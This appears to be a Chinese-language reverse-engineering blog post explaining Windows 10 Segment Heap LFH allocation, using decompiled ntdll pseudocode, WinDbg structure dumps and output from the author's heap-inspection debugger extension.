__int64 __fastcall RtlpAllocateHeapInternal(_SEGMENT_HEAP *HeapBase, unsigned __int64 InSize, __int64 a3, __int64 a4) { …… if ( InSize <= (unsigned int)WORD2(HeapBase->LfhContext.Buckets[0x13]) - 0x10 )//--->(0) { if(!(BucketTable[SizeIndex] & 1){//--->(1) RtlpHpLfhSlotAllocate() } else if(Allocate enough blocks){ //--->(2) RtlpHpLfhBucketActivate() } else{ do something//--->(3) } } if ( InSize > 0x20000 ) { RtlpHpLargeAlloc()//--->(4) } else{ RtlpHpVsContextAllocateInternal()//--->(5) } …… }接下来我会就代码中的逻辑进行简要说明。
(0) 分配时首先判断申请堆的大小是否小于等于0x4000-0x10,也就是0x3ff0,若大于0x4000且小于等于0x20000,则直接使用Variable Size Heap Allocate,如果大于0x20000则使用Large Heap Allocate。 (1) 若申请堆大小小于等于0x3ff0,则会在Bucket Table中找到分配大小对应Size的索引,之后判断其是否已经激活LFH(第一比特是否为1),当LFH已经激活时,if语句判断返回TRUE,直接调用RtlpHpLfhSlotAllocate申请Block。 (2) 否则检查当前申请的堆大小的已申请数量是否已经满足激活LFH所需的数量,若满足,则调用RtlpHpLfhBucketActivate函数激活Bucket,此时Bucket Table对应位置会被Bucket Header赋值。 (3) 如果分配数量还不满足则进行一些Flag的赋值后跳出if语句。 (4) 当申请堆大小大于0x20000时,则调用RtlpHpLargeAlloc申请Large Heap。 (5) 当满足(0)条件或者在(3)中没有达到激活LFH条件时,调用RtlpHpVsContextAllocateInternal申请VS Heap,也就是说(5)不一定只满足大于0x4000小于等于0x20000的情况,小于等于0x4000时也有可能会走VS Heap,这取决于已分配Block的数量。这里我们不讨论VS Heap和Large Heap,只讨论LFH Heap的情况。当LFH被激活时,RtlpHpLfhBucketActivate会创建一个Bucket Manager,并且将这个Manager指针放到Bucket Table对应Size Index的位置,我们要研究申请堆的Block的分配需要从这个Bucket Manager入手。
Block的申请在RtlpHpLfhSlotAllocate()函数中,关于这个函数代码逻辑比较复杂,我将从Bucket Manager入手结合关键的代码逻辑和大家分享LFH Block的分配过程。由于调试过程比较复杂,这里我不再贴出调试步骤记录占用篇幅,感兴趣的读者可以在RtlpHpLfhSlotAllocate单步跟踪加以印证。
Bucket Manager是一个名为_HEAP_LFH_BUCKET的结构,其成员变量包含一个重要结构_HEAP_LFH_AFFINITY_SLOT,该结构中包含的重要成员变量结构为_HEAP_LFH_SUBSEGMENT_OWNER,关于结构关系如下(重要结构我用*表示)。
1: kd> dt _HEAP_LFH_BUCKET 116`abf90b00 ntdll!_HEAP_LFH_BUCKET +0x000 State : _HEAP_LFH_SUBSEGMENT_OWNER +0x038 TotalBlockCount : 0x5b7 +0x040 TotalSubsegmentCount : 0x10 +0x048 ReciprocalBlockSize : 0x3333334 +0x04c Shift : 0x20 ' ' +0x04d ContentionCount : 0 '' +0x050 AffinityMappingLock : 0 +0x058 ProcAffinityMapping : 0x00000116`abf90b80 "" * +0x060 AffinitySlots : 0x00000116`abf90b88 -> 0x00000116`abf90bc0 _HEAP_LFH_AFFINITY_SLOT 1: kd> dt _HEAP_LFH_AFFINITY_SLOT 116`abf90bc0 ntdll!_HEAP_LFH_AFFINITY_SLOT * +0x000 State : _HEAP_LFH_SUBSEGMENT_OWNER +0x038 ActiveSubsegment : _HEAP_LFH_FAST_REF 1: kd> dt _HEAP_LFH_SUBSEGMENT_OWNER 116`abf90bc0 ntdll!_HEAP_LFH_SUBSEGMENT_OWNER +0x000 IsBucket : 0y0 +0x000 Spare0 : 0y0000000 (0) * +0x001 BucketIndex : 0x5 '' +0x002 SlotCount : 0 '' +0x002 SlotIndex : 0 '' +0x003 Spare1 : 0 '' * +0x008 AvailableSubsegmentCount : 1 +0x010 Lock : 0 * +0x018 AvailableSubsegmentList : _LIST_ENTRY [ 0x00000116`ac5d4000 - 0x00000116`ac5d4000 ] * +0x028 FullSubsegmentList : _LIST_ENTRY [ 0x00000116`ac0f7000 - 0x00000116`ac5d0000 ]LHF的Bucket是通过双向链表的方法管理,AvailableSubsegmentList是存在Free状态的Block的Bucket链表,FullSubsegmentList是已经满了的Bucket的链表,这两个链表存放的就是各个Bucket的Bucket Header,当LFH分配Block时,会检查Bucket Manager中AvailableSubsegementCount的值,若其值小于等于0,则继续判断AvailableSubsegementList,在AvailableSubsegmentList中没有可用的Bucket header时,其值指向自己。
1: kd> dq 116`abf90bc0//_HEAP_LFH_SUBSEGMENT_OWNER结构 00000116`abf90bc0 00000000`00000500 00000000`00000001//有可用的Bucket 00000116`abf90bd0 00000000`00000000 00000116`ac5d4000//AvailableSubsegmentList 00000116`abf90be0 00000116`ac5d4000 00000116`ac0f7000//FullSubsegmentList 00000116`abf90bf0 00000116`ac5d0000 00000000`00000000 3: kd> dq 116`abf908c0//_HEAP_LFH_SUBSEGMENT_OWNER结构 00000116`abf908c0 00000000`00000c00 00000000`00000000//可用的Count为0 00000116`abf908d0 00000000`00000000 00000116`abf908d8//AvailableSubsegmentList指向本身 00000116`abf908e0 00000116`abf908d8 00000116`abf908e8//FullSubsegmentList指向本身 00000116`abf908f0 00000116`abf908e8 00000000`00000000 v10 = &a3->State.AvailableSubsegmentCount; if ( a3->State.AvailableSubsegmentCount <= 0 )//当Count小于0 { …… v121 = (__int64 **)&a2->State.AvailableSubsegmentList; if ( *v121 == (__int64 *)v121//链表指针指向本身 || ((RtlAcquireSRWLockExclusive(&a2->State.Lock), *v121 == (__int64 *)v121) ? (_RSI = 0i64) : (_RSI = RtlpHpLfhOwnerMoveSubsegment((__int64)a2, *v121, 2)), RtlReleaseSRWLockExclusive(&a2->State.Lock), !_RSI) ) { _RSI = (__int64 *)RtlpHpLfhSubsegmentCreate(a1, a2, a5); if ( !_RSI ) goto LABEL_52; } …… }如果满足上述条件,则当前没有可用的Bucket,LFH调用RtlpHpLfhSubsegmentCreate创建一个新的Bucket,在RtlpHpLfhSubsegmentCreate函数中,我们可以看到实际上在_HEAP_LFH_SUBSEGMENT_OWNER中的BucketIndex成员变量用于在ntdll的一个全局变量RtlpBucketBlockSizes中获取这个Bucket Manager所管理的Bucket中Block的Size,也就是我们申请堆的Size。
v3 = a2->State.BucketIndex; v4 = RtlpHpLfhPerfFlags; v10 = a3; v8 = (unsigned __int16)RtlpBucketBlockSizes[v3]; v33 = (unsigned __int16)RtlpBucketBlockSizes[v3]; 1: kd> dq ntdll!RtlpBucketBlockSizes 00007ffc`5cbe1270 00300020`00100000 00700060`00500040//Block Size 00007ffc`5cbe1280 00b000a0`00900080 00f000e0`00d000c0 00007ffc`5cbe1290 01300120`01100100 01700160`01500140 00007ffc`5cbe12a0 01b001a0`01900180 01f001e0`01d001c0 00007ffc`5cbe12b0 02300220`02100200 02700260`02500240 00007ffc`5cbe12c0 02b002a0`02900280 02f002e0`02d002c0在RtlpHpLfhSubsegmentCreate函数最终会分配出一个Bucket,将Bucket Header赋值给AvailableSubsegementList,同时这个函数中会按照RtlpBucketBlockSizes对应BlockIndex的地址,返回Size,最终切割好Block。
一旦存在可用的Bucket,则来到分配的最后一步,实际上理解分配最后一步非常简单,在Bucket创建时,所有可用的堆已经被切割好,LFH会随机取一块Block,并且将这个Block的地址返回,这个地址就是我们申请堆的地址,这一步全部依靠Bucket Header完成。
在Segment Heap LFH中,堆不再具有头部,取而代之的是通过Bucket Header来管理Bucket中的所有Block。Bucket Header结构体叫做_HEAP_LFH_SUBSEGMENT
1: kd> dt _HEAP_LFH_SUBSEGMENT 116`ac0f7000 FreeCount, BlockCount, BlockBitmap ntdll!_HEAP_LFH_SUBSEGMENT +0x020 FreeCount : 0 +0x022 BlockCount : 0x32 +0x030 BlockBitmap : [1] 0x55555555`55555555 1: kd> dq 116`ac0f7000 00000116`ac0f7000 00000116`ac1f9000 00000116`abf90be8//List_Entry 00000116`ac0f7010 00000116`abf90bc0 00000000`00000000 00000116`ac0f7020 0001002c`00320000 0040010c`60b53c07 00000116`ac0f7030 55555555`55555555 fffffff5`55555555 00000116`ac0f7040 00000000`00000001 00000000`00000000在Bucket Header中,Bitmap中存放的是这个Bucket中所有Block的状态,关于这个状态在Yason的slide中有相关介绍,这里我就不赘述了,值得一提的是,当你申请堆的大小恰好和RtlpBucketBlockSizes中存放的大小相等时,Bitmap的01代表已分配状态,00代表空闲状态,而当你申请的大小与RtlpBucketBlockSizes中存放大小不等时,则Bucket依然会按照RtlpBucketBlockSizes中存放的大小切割,但11代表已分配状态,10代表空闲状态,比方说我申请0xc10大小,但实际Block大小会按照0xC80切割,同时bitmap中高位会置1,这一切都取决于Bucket的索引在RtlpBucketBlockSizes数组中对应位置存放的Size。
分配时,会在bitmap中找到随机一个空闲状态的Block并返回,同时会将bitmap中对应位置置成分配状态(低位置1),并且FreeCount减1,当FreeCount减到0时,证明Bucket全部分配满,LFH会将该Bucket从AvailableSubsegmentList链表中unlink,并插入FullSubsegmentList中。
同理释放时,会将bitmap对应的位置置成空闲状态,FreeCount加1,若当前Bucket在FullSubsegmentList中,则会从该链表unlink,并加入到AvailableSubsegmentList中。
最后,关于创建Bucket的时候到底分配多少Block,这个并不是固定的,而是根据_HEAP_LFH_BUCKET中的TotalSubsegmentCount以及申请堆的大小决定的,其函数实现在RtlpGetSubSegmentBlockCount中。
__int64 __fastcall RtlpGetSubSegmentBlockCount(unsigned int HeapSize, unsigned int TotalSubSegmentCount, char AlwaysZero, int IsFirstBucket) { v5 = AlwaysZero - 1; if ( HeapSize >= 0x100 ) v5 = AlwaysZero; v6 = v5 - 1; if ( !IsFirstBucket )//如果是这个Size的第一个Bucket v6 = v5; if ( TotalSubSegmentCount < 1 << (3 - v6) ) TotalSubSegmentCount = 1 << (3 - v6); if ( TotalSubSegmentCount < 4 ) TotalSubSegmentCount = 4; if ( TotalSubSegmentCount > 0x400 ) TotalSubSegmentCount = 0x400; return TotalSubSegmentCount; }随着该Size分配的堆数量的增加,最终一个Bucket中创建的Blocks也会增加。
在我的Windbg Extension中,由于Bucket Header都是按页对齐,因此通过查询的堆地址直接与0xff..f000做与运算后就可以找到页头部,假设该头部是Bucket Header时,其_HEAP_LFH_SUBSEGMENT的_HEAP_LFH_SUBSEGMENT_OWNER成员变量指向Bucket Manager,之后可以找到整个Segment Heap的头部,通过Signature就可以判断Bucket Header是否是有效的Bucket Header,如果不是,则将当前页头部-0x1000,继续按页查找,因为当前分配的Block可能不止一页。
之后根据Bucket Header的Bucket Index可以在全局变量RtlpBucketBlockSizes数组中找到当前Bucket的Size,通过bitmap可以打印最终的Bucket布局。
1: kd> !heapinfo 116`ac0f7060 Try to find Bucket Manager. Bucket Header: 0x00000116ac0f7000 Bucket Flink: 0x00000116ac1f9000 Bucket Blink: 0x00000116abf90be8 Bucket Manager: 0x00000116abf90bc0 ---------------------Bucket Info--------------------- Free Heap Count: 0 Total Heap Count: 50 Block Size: 0x50 --Index-- | -----Heap Address----- | --Size-- | --State-- 0000 | *0x00000116ac0f7050 | 0x0050 | Busy --------- | ---------------------- | -------- | --------- 0001 | 0x00000116ac0f70a0 | 0x0050 | Busy --------- | ---------------------- | -------- | --------- 0002 | 0x00000116ac0f70f0 | 0x0050 | Busy --------- | ---------------------- | -------- | --------- 0003 | 0x00000116ac0f7140 | 0x0050 | Busy --------- | ---------------------- | -------- | --------- 0004 | 0x00000116ac0f7190 | 0x0050 | Busy --------- | ---------------------- | -------- | --------- 0005 | 0x00000116ac0f71e0 | 0x0050 | Busy --------- | ---------------------- | -------- | --------- 0006 | 0x00000116ac0f7230 | 0x0050 | Busy --------- | ---------------------- | -------- | --------- 0007 | 0x00000116ac0f7280 | 0x0050 | Busy --------- | ---------------------- | -------- | --------- 引用MarkYason, "Windows 10 Segment Heap Internals"
My Project: SegmentHeapExt